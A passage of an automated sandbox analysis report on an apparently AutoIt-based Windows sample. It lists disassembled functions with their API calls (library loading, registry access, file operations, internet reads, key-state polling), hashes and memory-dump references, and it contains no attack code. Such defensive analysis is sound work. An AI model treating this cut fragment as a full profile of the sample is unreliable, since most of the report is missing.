                                  • FreeLibrary.KERNEL32(00000000,?,?,00354EDD,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354EC0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                  • API String ID: 145871493-3689287502
                                  • Opcode ID: a3771859614780aeab02fcfa7e4a0ce7f7dcdc347467e3b52fe63d57df8c7b4f
                                  • Instruction ID: fddf56cdd43b6cb000a7fd72cb148842b4ac2740e5585f0b34e3053d2b9fe2d2
                                  • Opcode Fuzzy Hash: a3771859614780aeab02fcfa7e4a0ce7f7dcdc347467e3b52fe63d57df8c7b4f
                                  • Instruction Fuzzy Hash: 62E0CD35E126325BD2371B256C1DF5FA55CAF82F67F064215FC01D7290DB64CD4740A4
                                  Function 00354E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00393CDE,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E62
                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00354E74
                                  • FreeLibrary.KERNEL32(00000000,?,?,00393CDE,?,00421418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00354E87
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Library$AddressFreeLoadProc
                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                  • API String ID: 145871493-1355242751
                                  • Opcode ID: 5712c73451b6b65a66e126d907e11554f7b7229407a0f0fe7c1057afdca46082
                                  • Instruction ID: c44f1f9160a8df24fcfb5ac11409a77799d0dfad65f332846f7c741b4afde51d
                                  • Opcode Fuzzy Hash: 5712c73451b6b65a66e126d907e11554f7b7229407a0f0fe7c1057afdca46082
                                  • Instruction Fuzzy Hash: 4FD0C2319126726746371B256C09ECF6A1CAF81F1A3060315FC01A62A0CF20CD4281D0
                                  Function 003DA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 003DA427
                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003DA435
                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003DA468
                                  • CloseHandle.KERNEL32(?), ref: 003DA63D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$CloseCountersCurrentHandleOpen
                                  • String ID:
                                  • API String ID: 3488606520-0
                                  • Opcode ID: 1cdf227984c6f8139f36971f8d998b7d9f050d1cf950589969bfe76307e9e331
                                  • Instruction ID: dc1ecb7303d69e390b3d5f5744308e09579e1fa4c137450de7a1f5bc66024d1c
                                  • Opcode Fuzzy Hash: 1cdf227984c6f8139f36971f8d998b7d9f050d1cf950589969bfe76307e9e331
                                  • Instruction Fuzzy Hash: D8A19D716047009FD722DF24D882F2AB7E5AF84714F14885DF99A9B392DBB0EC45CB82
                                  Function 003BE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 003BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003BCF22,?), ref: 003BDDFD
                                    • Part of subcall function 003BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003BCF22,?), ref: 003BDE16
                                    • Part of subcall function 003BE199: GetFileAttributesW.KERNEL32(?,003BCF95), ref: 003BE19A
                                  • lstrcmpiW.KERNEL32(?,?), ref: 003BE473
                                  • MoveFileW.KERNEL32(?,?), ref: 003BE4AC
                                  • _wcslen.LIBCMT ref: 003BE5EB
                                  • _wcslen.LIBCMT ref: 003BE603
                                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003BE650
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                  • String ID:
                                  • API String ID: 3183298772-0
                                  • Opcode ID: 84a0f8c229721351db07ff56e9c2e64c5fe105ebe90122e0f646ae36ff2db0df
                                  • Instruction ID: 12b483b9d2976f85d9ae1794a6e5cca7d119ef23323c89f9ed9f548fa22f4718
                                  • Opcode Fuzzy Hash: 84a0f8c229721351db07ff56e9c2e64c5fe105ebe90122e0f646ae36ff2db0df
                                  • Instruction Fuzzy Hash: 375183B24083859BC736DBA4C881ADF73ECAF85344F00491EF689D7191EF74A58C8766
                                  Function 003DB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                    • Part of subcall function 003DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DB6AE,?,?), ref: 003DC9B5
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DC9F1
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA68
                                    • Part of subcall function 003DC998: _wcslen.LIBCMT ref: 003DCA9E
                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003DBAA5
                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003DBB00
                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 003DBB63
                                  • RegCloseKey.ADVAPI32(?,?), ref: 003DBBA6
                                  • RegCloseKey.ADVAPI32(00000000), ref: 003DBBB3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                  • String ID:
                                  • API String ID: 826366716-0
                                  • Opcode ID: c141d04a37a6f7f98062fbcd17f8f0f6c9803a60ca57f63a35aa94ed0dd16e24
                                  • Instruction ID: a975354849922471d3e69b79ff17541724fa4f8e8f5ffbcc99ab9ff9204797e9
                                  • Opcode Fuzzy Hash: c141d04a37a6f7f98062fbcd17f8f0f6c9803a60ca57f63a35aa94ed0dd16e24
                                  • Instruction Fuzzy Hash: 01619E31208241EFC716DF14D490E2ABBE9FF84308F55899EF4994B2A2DB31ED45CB92
                                  Function 003B8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                  Download Yara Rule
                                  APIs
                                  • VariantInit.OLEAUT32(?), ref: 003B8BCD
                                  • VariantClear.OLEAUT32 ref: 003B8C3E
                                  • VariantClear.OLEAUT32 ref: 003B8C9D
                                  • VariantClear.OLEAUT32(?), ref: 003B8D10
                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003B8D3B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Variant$Clear$ChangeInitType
                                  • String ID:
                                  • API String ID: 4136290138-0
                                  • Opcode ID: 1520ffae0751dd47adfce7cbf066a3a45ba0f7aff8be2f34df7d98e07ec73969
                                  • Instruction ID: 86ca3240313139ccdb88048229105c69148f3872eb4db945c0d8978e9e19b09a
                                  • Opcode Fuzzy Hash: 1520ffae0751dd47adfce7cbf066a3a45ba0f7aff8be2f34df7d98e07ec73969
                                  • Instruction Fuzzy Hash: 965169B5A00619EFCB15CF68C894AAAB7F8FF89314F15855AE909DB350E730E911CF90
                                  Function 003C8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003C8BAE
                                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003C8BDA
                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003C8C32
                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003C8C57
                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003C8C5F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: PrivateProfile$SectionWrite$String
                                  • String ID:
                                  • API String ID: 2832842796-0
                                  • Opcode ID: dc8a8ce29fe25b162bc06559ba6c28924d5a566b93a7a419762fa4657b78ffc5
                                  • Instruction ID: 1ed9113b4ed4a97690d58e095e4ddc318f207aa4020a860f9d2145700295a33d
                                  • Opcode Fuzzy Hash: dc8a8ce29fe25b162bc06559ba6c28924d5a566b93a7a419762fa4657b78ffc5
                                  • Instruction Fuzzy Hash: 33512735A002159FCB16DF64C881E69BBF5BF49314F088458E849AF3B2DB31ED55CB90
                                  Function 003D8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 003D8F40
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003D8FD0
                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 003D8FEC
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 003D9032
                                  • FreeLibrary.KERNEL32(00000000), ref: 003D9052
                                    • Part of subcall function 0036F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003C1043,?,753CE610), ref: 0036F6E6
                                    • Part of subcall function 0036F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,003AFA64,00000000,00000000,?,?,003C1043,?,753CE610,?,003AFA64), ref: 0036F70D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                  • String ID:
                                  • API String ID: 666041331-0
                                  • Opcode ID: c32d57ea187a2890a640c5c7bb34d66145720243433936f5556134109358c490
                                  • Instruction ID: 4cffe47258a5b4cca2c631a410c9e297b78c198c253665d8ace21ee9ba13c9a5
                                  • Opcode Fuzzy Hash: c32d57ea187a2890a640c5c7bb34d66145720243433936f5556134109358c490
                                  • Instruction Fuzzy Hash: 0B513935604205DFCB16DF68E484DADBBB5FF49314B05849AE8069F362DB31ED86CB90
                                  Function 003E6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 003E6C33
                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 003E6C4A
                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 003E6C73
                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003CAB79,00000000,00000000), ref: 003E6C98
                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 003E6CC7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Window$Long$MessageSendShow
                                  • String ID:
                                  • API String ID: 3688381893-0
                                  • Opcode ID: 13ba7a434940ea2dae6a85a6fa422d080de3e02c4196a26090e7f2876ae43690
                                  • Instruction ID: 4d17283485b3e52d6079bc14f8c09389fd852c3871b94b022d8cf274fef582a4
                                  • Opcode Fuzzy Hash: 13ba7a434940ea2dae6a85a6fa422d080de3e02c4196a26090e7f2876ae43690
                                  • Instruction Fuzzy Hash: 9D41F8356001A4AFD726CF2ACC96FA97BA9EB19390F260328FC55A72E0C371ED41C640
                                  Function 00382051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: d5b8699ebb18b7f57af38aab7f12030c698b7924e6f8193ac64ee97555f058ca
                                  • Instruction ID: 1dac18a21d66b68e2a8db8bf01f72c30e87f093622fee83b277657f1121c9987
                                  • Opcode Fuzzy Hash: d5b8699ebb18b7f57af38aab7f12030c698b7924e6f8193ac64ee97555f058ca
                                  • Instruction Fuzzy Hash: BF41D272A003009FCB26EF78C885A5EB7E5EF89314F2685A9E515EB395D731ED01CB80
                                  Function 0036912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCursorPos.USER32(?), ref: 00369141
                                  • ScreenToClient.USER32(00000000,?), ref: 0036915E
                                  • GetAsyncKeyState.USER32(00000001), ref: 00369183
                                  • GetAsyncKeyState.USER32(00000002), ref: 0036919D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: AsyncState$ClientCursorScreen
                                  • String ID:
                                  • API String ID: 4210589936-0
                                  • Opcode ID: 4783d157703253767245395d668979f115ad714dd943dd36bea20e4fd2f2d570
                                  • Instruction ID: 4e59ce74c68e54c56a42561d8e77c93b507b0b73d36f6309547413bf6ce93edc
                                  • Opcode Fuzzy Hash: 4783d157703253767245395d668979f115ad714dd943dd36bea20e4fd2f2d570
                                  • Instruction Fuzzy Hash: 5B417231A0861AFBDF169F65CC84BEEB7B8FB06320F208316E425A72D4C7345954CB91
                                  Function 003C3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetInputState.USER32 ref: 003C38CB
                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 003C3922
                                  • TranslateMessage.USER32(?), ref: 003C394B
                                  • DispatchMessageW.USER32(?), ref: 003C3955
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003C3966
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                  • String ID:
                                  • API String ID: 2256411358-0
                                  • Opcode ID: 303f1dd2c453e9c4e9dede49c7aabb563bf3e1c9340ed6378e7e5ecdd003d5bb
                                  • Instruction ID: 9893ad8c336d5f2a9fa81e58acf6a26ad0e4159ff7cac01c57f1102d051ce472
                                  • Opcode Fuzzy Hash: 303f1dd2c453e9c4e9dede49c7aabb563bf3e1c9340ed6378e7e5ecdd003d5bb
                                  • Instruction Fuzzy Hash: 5E31C670A043829EEB37CB349848FB637A8AB16304F45857DE452C60E0E7B49E86CB15
                                  Function 003CCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 003CCF38
                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 003CCF6F
                                  • GetLastError.KERNEL32(?,00000000,?,?,?,003CC21E,00000000), ref: 003CCFB4
                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,003CC21E,00000000), ref: 003CCFC8
                                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,003CC21E,00000000), ref: 003CCFF2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                  • String ID:
                                  • API String ID: 3191363074-0
                                  • Opcode ID: bde7ba6ff218fb847d1464b5a86de1aec04bdb35daa5c67e4f72814a89bddbb5
                                  • Instruction ID: 3dca51ddaf533ac989aac06aa466e28a969a49573f8e2e7be349311635af5cd1
                                  • Opcode Fuzzy Hash: bde7ba6ff218fb847d1464b5a86de1aec04bdb35daa5c67e4f72814a89bddbb5
                                  • Instruction Fuzzy Hash: A9316B71910205EFDB22DFA5D884EAEBBFDEB04310B10542EF51AD6141DB30AE419B60
                                  Function 003B1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindowRect.USER32(?,?), ref: 003B1915
